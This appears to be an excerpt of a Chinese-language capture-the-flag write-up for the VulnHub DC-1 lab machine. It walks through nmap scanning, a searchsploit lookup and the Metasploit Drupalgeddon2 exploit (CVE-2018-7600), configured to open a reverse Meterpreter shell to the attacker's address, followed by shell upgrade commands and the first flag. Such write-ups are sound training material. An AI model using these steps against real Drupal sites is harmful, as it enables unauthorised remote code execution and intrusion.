VulnHub DC-1 靶机渗透测试中,如何找到并利用特定漏洞进行攻击?

摘要:🛡️ VulnHub DC-1 靶机渗透测试笔记 靶机信息 靶机名称:DC-1 靶机来源:VulnHub 目标:获取所有 flag,最终提权至 root 难度:⭐⭐☆☆☆(入门级) 涉及技术:信息收集、Dru
🛡️ VulnHub DC-1 靶机渗透测试笔记 靶机信息 靶机名称:DC-1 靶机来源:VulnHub 目标:获取所有 flag,最终提权至 root 难度:⭐⭐☆☆☆(入门级) 涉及技术:信息收集、Drupal 漏洞利用、MySQL 数据库操作、Linux 权限提升、SSH 爆破 🔍 一、信息收集 1.1 主机发现 先查看一下本地网段,确认在 67 网段,使用 nmap 扫描存活主机: nmap -sn 192.168.67.0/24 扫描结果中发现目标 IP 为 192.168.67.131。 1.2 端口与服务扫描 对目标 IP 进行详细扫描,获取开放端口、服务版本及系统信息: nmap -A -T4 192.168.67.131 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) 80/tcp open http Apache httpd 2.2.22 ((Debian)) |_http-generator: Drupal 7 111/tcp open rpcbind 2-4 (RPC #100000) 扫描结果分析: 端口 服务 关键信息 22 SSH OpenSSH 6.0p1,版本较老 80 HTTP Drupal 7,Apache 2.2.22 111 RPC 基本无利用价值 💡 关键发现: 80 端口运行的是 Drupal 7 CMS,这是一个存在多个高危漏洞的版本,是本次渗透的主要突破口。 💥 二、漏洞利用 2.1 搜索 Drupal 漏洞 使用 searchsploit 在本地漏洞库中搜索 Drupal 7 相关漏洞: searchsploit drupal 7 发现 Drupalgeddon2(CVE-2018-7600) 漏洞,该漏洞允许未授权远程代码执行(RCE),危害极高。 2.2 使用 Metasploit 利用漏洞 启动 Metasploit 框架: msfconsole 搜索并加载 Drupalgeddon2 模块: search Drupalgeddon use exploit/unix/webapp/drupal_drupalgeddon2 查看模块参数配置(Required: yes 为必填项): show options 配置目标和本机 IP: set RHOSTS 192.168.67.131 set LHOST 192.168.67.128 set LPORT 4444 执行攻击: run 成功获取 Meterpreter shell,进入交互式终端: shell python -c 'import pty;pty.spawn("/bin/bash")' 查看当前权限: whoami # www-data id uname -a # Linux DC-1 3.2.0-6-486 ⚠️ 当前为 www-data 权限,需要进一步提权。 🚩 三、寻找 Flag 3.1 Flag 1 查看当前目录文件,发现 flag1.txt: Every good CMS needs a config file - and so do you. 💡 提示:去找 CMS 的配置文件。
阅读全文